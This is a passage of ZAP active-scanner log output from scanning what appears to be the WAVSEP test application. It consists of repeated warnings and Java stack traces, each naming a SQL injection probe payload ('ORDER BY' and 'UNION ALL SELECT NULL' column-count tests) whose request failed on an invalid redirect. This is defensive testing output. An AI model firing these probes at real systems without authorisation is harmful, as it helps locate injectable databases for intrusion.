org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680365 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680367 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680368 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 3913-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' ORDER BY 3913-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680369 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680371 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680372 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680374 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680375 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680376 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680377 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680379 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680380 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at 